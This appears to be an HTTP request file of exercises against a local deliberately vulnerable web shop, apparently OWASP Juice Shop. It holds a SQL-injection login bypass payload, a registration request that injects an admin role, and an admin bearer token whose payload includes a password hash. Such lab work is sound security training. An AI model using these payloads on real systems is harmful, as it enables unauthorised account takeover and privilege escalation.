@base-url = http://localhost:3000

### GET the score board
GET {{base-url}}/#/score-board


### Force invalid error handling
GET {{base-url}}/rest/qwerty


### Login with admin account through SQL-injection
POST {{base-url}}/rest/user/login
Content-Type: application/json

{
    "email": "' OR TRUE--",
    "password": "12345"
}

### Register a user with administrative rights
### Step 1: Find out properties of users in system
POST {{base-url}}/api/Users
Content-Type: application/json

{
    "email":"userTest@test.se",
    "password":"T3stT3st",
    "passwordRepeat":"T3stT3st",
    "securityQuestion": {
        "id":2,
        "question":"Mother's maiden name?",
        "createdAt":"2022-02-10T18:22:42.379Z",
        "updatedAt":"2022-02-10T18:22:42.379Z"
    },
    "securityAnswer":"Test"
}

### Step2: Provide value for property
POST {{base-url}}/api/Users
Content-Type: application/json

{
    "email":"adminTest@test.se",
    "password":"T3stT3st",
    "passwordRepeat":"T3stT3st",
    "securityQuestion": {
        "id":2,
        "question":"Mother's maiden name?",
        "createdAt":"2022-02-10T18:22:42.379Z",
        "updatedAt":"2022-02-10T18:22:42.379Z"
    },
    "securityAnswer":"Test",
    "role": "admin"
}


### Login with jims account through SQL-injection
GET {{base-url}}/api/Users
Content-Type: application/json
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwidXNlcm5hbWUiOiIiLCJlbWFpbCI6ImFkbWluQGp1aWNlLXNoLm9wIiwicGFzc3dvcmQiOiIwMTkyMDIzYTdiYmQ3MzI1MDUxNmYwNjlkZjE4YjUwMCIsInJvbGUiOiJhZG1pbiIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiJ1bmRlZmluZWQiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHRBZG1pbi5wbmciLCJ0b3RwU2VjcmV0IjoiIiwiaXNBY3RpdmUiOnRydWUsImNyZWF0ZWRBdCI6IjIwMjQtMDUtMzEgMTk6MzQ6MjAuODA2ICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMjQtMDYtMDQgMDk6NDQ6NDguNDE2ICswMDowMCIsImRlbGV0ZWRBdCI6bnVsbH0sImlhdCI6MTcxNzQ5NDQ3MX0.Men0KDDoN7ZCciGxDsD3L0rc2HJeEFLR4-sAu9rOEUMvDH5MwnblnlRO9YqLAu89JnJFD0mxllw7hQhOpfEgPWoOpKmiXy0fBPCuemBs7IgPNrrIczzTz5Z6hbtbQOGCjxyb7YxFXW-6wGHhuVLLKa6dzLUqEYxYrdzGVWAd_mA
